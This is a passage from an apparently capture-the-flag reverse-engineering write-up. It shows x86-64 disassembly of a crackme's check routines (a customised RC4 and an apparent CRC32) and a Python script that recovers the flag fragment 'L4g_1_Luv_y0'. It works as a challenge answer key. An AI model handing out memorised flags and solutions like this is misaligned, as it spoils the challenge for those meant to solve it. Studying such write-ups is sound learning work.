 2d6:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 2dc:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 2de:   8b <span class="hljs-number">95</span> <span class="hljs-number">84</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x47c</span>]
 2e4:   <span class="hljs-number">89</span> <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>],<span class="hljs-built_in">edx</span>
 2eb:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 2f1:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 2f3:   8b <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 2fa:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 <span class="hljs-number">300</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">302</span>:   8b <span class="hljs-number">84</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 <span class="hljs-number">309</span>:   <span class="hljs-number">8d</span> 0c <span class="hljs-number">02</span>                <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">ecx</span>,[<span class="hljs-built_in">rdx</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>]
 30c:   ba <span class="hljs-number">15</span> <span class="hljs-number">02</span> <span class="hljs-number">4d</span> <span class="hljs-number">21</span>          <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x214d0215</span>
 <span class="hljs-number">311</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">313</span>:   f7 ea                   <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">edx</span>
 <span class="hljs-number">315</span>:   c1 fa <span class="hljs-number">05</span>                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x5</span>
 <span class="hljs-number">318</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 31a:   c1 f8 1f                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x1f</span>
 <span class="hljs-number">31d</span>:   <span class="hljs-number">29</span> c2                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 31f:   <span class="hljs-number">89</span> d0                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 <span class="hljs-number">321</span>:   <span class="hljs-number">69</span> c0 f6 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>       <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>,<span class="hljs-number">0xf6</span>
 <span class="hljs-number">327</span>:   <span class="hljs-number">29</span> c1                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">329</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 32b:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">32d</span>:   8b <span class="hljs-number">84</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 <span class="hljs-number">334</span>:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">88</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x478</span>],<span class="hljs-built_in">eax</span>
 33a:   8b <span class="hljs-number">85</span> <span class="hljs-number">88</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x478</span>]
 <span class="hljs-number">340</span>:   <span class="hljs-number">89</span> c1                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">342</span>:   8b <span class="hljs-number">85</span> 7c fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x484</span>]
 <span class="hljs-number">348</span>:   <span class="hljs-number">48</span> <span class="hljs-number">63</span> d0                <span class="hljs-keyword">movsxd</span> <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">eax</span>
 34b:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">68</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x498</span>]
 <span class="hljs-number">352</span>:   <span class="hljs-number">48</span> <span class="hljs-number">01</span> d0                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
 <span class="hljs-number">355</span>:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
 <span class="hljs-number">358</span>:   <span class="hljs-number">31</span> c8                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 35a:   <span class="hljs-number">89</span> c2                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 35c:   8b <span class="hljs-number">85</span> 7c fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x484</span>]
 <span class="hljs-number">362</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">364</span>:   <span class="hljs-number">88</span> <span class="hljs-number">54</span> <span class="hljs-number">05</span> c0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x40</span>],<span class="hljs-built_in">dl</span>
 <span class="hljs-number">368</span>:   <span class="hljs-number">83</span> <span class="hljs-number">85</span> 7c fb ff ff <span class="hljs-number">01</span>    <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x484</span>],<span class="hljs-number">0x1</span>
 36f:   8b <span class="hljs-number">85</span> 7c fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x484</span>]
 <span class="hljs-number">375</span>:   3b <span class="hljs-number">85</span> <span class="hljs-number">64</span> fb ff ff       <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x49c</span>]
 37b:   0f 8c 9f fe ff ff       <span class="hljs-keyword">jl</span>     <span class="hljs-number">0x220</span>
 <span class="hljs-number">381</span>:   c7 <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x0</span>
 <span class="hljs-number">388</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 38b:   eb 2f                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x3bc</span>
 <span class="hljs-number">38d</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 <span class="hljs-number">393</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">395</span>:   0f b6 <span class="hljs-number">54</span> <span class="hljs-number">05</span> c0          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x40</span>]
 39a:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 3a0:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 3a2:   0f b6 <span class="hljs-number">44</span> <span class="hljs-number">05</span> <span class="hljs-number">83</span>          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x7d</span>]
 3a7:   <span class="hljs-number">38</span> c2                   <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">dl</span>,<span class="hljs-built_in">al</span>
 3a9:   <span class="hljs-number">74</span> 0a                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x3b5</span>
 3ab:   c7 <span class="hljs-number">85</span> <span class="hljs-number">78</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x488</span>],<span class="hljs-number">0x0</span>
 3b2:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 3b5:   <span class="hljs-number">83</span> <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">01</span>    <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x1</span>
 3bc:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 3c2:   3b <span class="hljs-number">85</span> <span class="hljs-number">64</span> fb ff ff       <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x49c</span>]
 3c8:   7c c3                   <span class="hljs-keyword">jl</span>     <span class="hljs-number">0x38d</span>
 3ca:   8b <span class="hljs-number">85</span> <span class="hljs-number">78</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x488</span>]
 3d0:   <span class="hljs-number">48</span> 8b <span class="hljs-number">75</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>]
 3d4:   <span class="hljs-number">64</span> <span class="hljs-number">48</span> <span class="hljs-number">33</span> <span class="hljs-number">34</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
 3<span class="hljs-built_in">db</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 3<span class="hljs-built_in">dd</span>:   <span class="hljs-number">74</span> <span class="hljs-number">05</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x3e4</span>
 3df:   e8 <span class="hljs-number">33</span> f4 ff ff          <span class="hljs-keyword">call</span>   <span class="hljs-number">0xfffffffffffff817</span>
 3e4:   c9                      <span class="hljs-keyword">leave</span>  
 3e5:   c3                      <span class="hljs-keyword">ret</span>
</code></pre><p>It&#39;s hard to explain. But I figure out that check4 is a customized rc4 encryption.</p>
<p>Again, I have a script to get the fourth part of flag which is <code>L4g_1_Luv_y0</code></p>
<pre class="hljs"><code>from pwn <span class="hljs-keyword">import</span> *

cipher=p64(<span class="hljs-number">0x14dd43a0935d</span>552b)+p32(<span class="hljs-number">0xe57d</span>5243)
key=p64(<span class="hljs-number">0x30645f</span>7361336c50)+p64(<span class="hljs-number">0x353452635f</span>74276e)+p64(<span class="hljs-number">0x21682b5f6e315f</span>68)+p64(<span class="hljs-number">0x312b436e55665f</span>73)+p32(<span class="hljs-number">0x6e30</span>)[:<span class="hljs-number">2</span>]


<span class="hljs-built_in">print</span> key,<span class="hljs-built_in">len</span>(key)
<span class="hljs-built_in">print</span> <span class="hljs-built_in">len</span>(cipher)



S=<span class="hljs-keyword">range</span>(<span class="hljs-number">0xf6</span>)
j = <span class="hljs-number">0</span>
<span class="hljs-keyword">for</span> i in <span class="hljs-keyword">range</span>(<span class="hljs-number">0xf6</span>):
  j=(j + S[i] + ord(key[i % <span class="hljs-built_in">len</span>(key)]))% <span class="hljs-number">0xf6</span>
  temp=S[i]
  S[i]=S[j]
  S[j]=temp

<span class="hljs-built_in">print</span> S


flag=<span class="hljs-string">""</span>
i=<span class="hljs-number">0</span>
j=<span class="hljs-number">0</span>
<span class="hljs-keyword">for</span> k in cipher:
  i=(i+<span class="hljs-number">1</span>)%<span class="hljs-number">0xf6</span>
  j=(j + S[i])%<span class="hljs-number">0xf6</span>
  temp=S[i]
  S[i]=S[j]
  S[j]=temp
  flag+=chr(ord(k)^S[(S[i] + S[j]) % <span class="hljs-number">0xf6</span>])

<span class="hljs-built_in">print</span> flag
</code></pre><pre class="hljs"><code><span class="hljs-symbol">check5:</span>
   <span class="hljs-number">0</span>:   <span class="hljs-number">55</span>                      <span class="hljs-keyword">push</span>   <span class="hljs-built_in">rbp</span>
   <span class="hljs-number">1</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> e5                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rbp</span>,<span class="hljs-built_in">rsp</span>
   <span class="hljs-number">4</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">7d</span> d8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x28</span>],<span class="hljs-built_in">rdi</span>
   <span class="hljs-number">8</span>:   c7 <span class="hljs-number">45</span> e4 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x1c</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">   f:</span>   c7 <span class="hljs-number">45</span> e8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">16</span>:   c7 <span class="hljs-number">45</span> f4 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">1d</span>:   c7 <span class="hljs-number">45</span> ec <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x14</span>],<span class="hljs-number">0x1</span>
  <span class="hljs-number">24</span>:   c7 <span class="hljs-number">45</span> f8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>],<span class="hljs-number">0x0</span>
  2b:   c7 <span class="hljs-number">45</span> f0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">32</span>:   c7 <span class="hljs-number">45</span> fc <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">39</span>:   c7 <span class="hljs-number">45</span> f0 ff ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>],<span class="hljs-number">0xffffffff</span>
  <span class="hljs-number">40</span>:   eb <span class="hljs-number">54</span>                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x96</span>
  <span class="hljs-number">42</span>:   8b <span class="hljs-number">45</span> e4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x1c</span>]
  <span class="hljs-number">45</span>:   <span class="hljs-number">8d</span> <span class="hljs-number">50</span> <span class="hljs-number">01</span>                <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">edx</span>,[<span class="hljs-built_in">rax</span>+<span class="hljs-number">0x1</span>]
  <span class="hljs-number">48</span>:   <span class="hljs-number">89</span> <span class="hljs-number">55</span> e4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x1c</span>],<span class="hljs-built_in">edx</span>
  4b:   <span class="hljs-number">48</span> <span class="hljs-number">63</span> d0                <span class="hljs-keyword">movsxd</span> <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">eax</span>
  4e:   <span class="hljs-number">48</span> 8b <span class="hljs-number">45</span> d8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x28</span>]
  <span class="hljs-number">52</span>:   <span class="hljs-number">48</span> <span class="hljs-number">01</span> d0                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
  <span class="hljs-number">55</span>:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
  <span class="hljs-number">58</span>:   0f be c0                <span class="hljs-keyword">movsx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
  5b:   <span class="hljs-number">89</span> <span class="hljs-number">45</span> f8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>],<span class="hljs-built_in">eax</span>
  5e:   8b <span class="hljs-number">45</span> f8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>]
  <span class="hljs-number">61</span>:   <span class="hljs-number">31</span> <span class="hljs-number">45</span> f0                <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>],<span class="hljs-built_in">eax</span>
  <span class="hljs-number">64</span>:   c7 <span class="hljs-number">45</span> e8 <span class="hljs-number">07</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x7</span>
  6b:   eb <span class="hljs-number">23</span>                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x90</span>
  <span class="hljs-number">6d</span>:   8b <span class="hljs-number">45</span> f0                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>]
  <span class="hljs-number">70</span>:   <span class="hljs-number">83</span> e0 <span class="hljs-number">01</span>                <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x1</span>
  <span class="hljs-number">73</span>:   f7 d8                   <span class="hljs-keyword">neg</span>    <span class="hljs-built_in">eax</span>
  <span class="hljs-number">75</span>:   <span class="hljs-number">89</span> <span class="hljs-number">45</span> fc                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4</span>],<span class="hljs-built_in">eax</span>
  <span class="hljs-number">78</span>:   8b <span class="hljs-number">45</span> f0                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>]
  7b:   d1 e8                   <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">1</span>
  <span class="hljs-number">7d</span>:   <span class="hljs-number">89</span> c2                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
  7f:   8b <span class="hljs-number">45</span> fc                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4</span>]
  <span class="hljs-number">82</span>:   <span class="hljs-number">25</span> <span class="hljs-number">20</span> <span class="hljs-number">83</span> b8 ed          <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0xedb88320</span>
  <span class="hljs-number">87</span>:   <span class="hljs-number">31</span> d0                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
  <span class="hljs-number">89</span>:   <span class="hljs-number">89</span> <span class="hljs-number">45</span> f0                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>],<span class="hljs-built_in">eax</span>
  8c:   <span class="hljs-number">83</span> <span class="hljs-number">6d</span> e8 <span class="hljs-number">01</span>             <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x1</span>
  <span class="hljs-number">90</span>:   <span class="hljs-number">83</span> <span class="hljs-number">7d</span> e8 <span class="hljs-number">00</span>             <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">94</span>:   <span class="hljs-number">79</span> d7                   <span class="hljs-keyword">jns</span>    <span class="hljs-number">0x6d</span>
  <span class="hljs-number">96</span>:   8b <span class="hljs-number">45</span> e4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x1c</span>]
  <span class="hljs-number">99</span>:   <span class="hljs-number">48</span> <span class="hljs-number">63</span> d0                <span class="hljs-keyword">movsxd</span> <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">eax</span>
  9c:   <span class="hljs-number">48</span> 8b <span class="hljs-number">45</span> d8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x28</span>]
<span class="hljs-symbol">  a0:</span>   <span class="hljs-number">48</span> <span class="hljs-number">01</span> d0                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
<span class="hljs-symbol">  a3:</span>   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
<span class="hljs-symbol">  a6:</span>   <span class="hljs-number">84</span> c0                   <span class="hljs-keyword">test</span>   <span class="hljs-built_in">al</span>,<span class="hljs-built_in">al</span>
<span class="hljs-symbol">  a8:</span>   <span class="hljs-number">75</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">jne</span>    <span class="hljs-number">0x42</span>
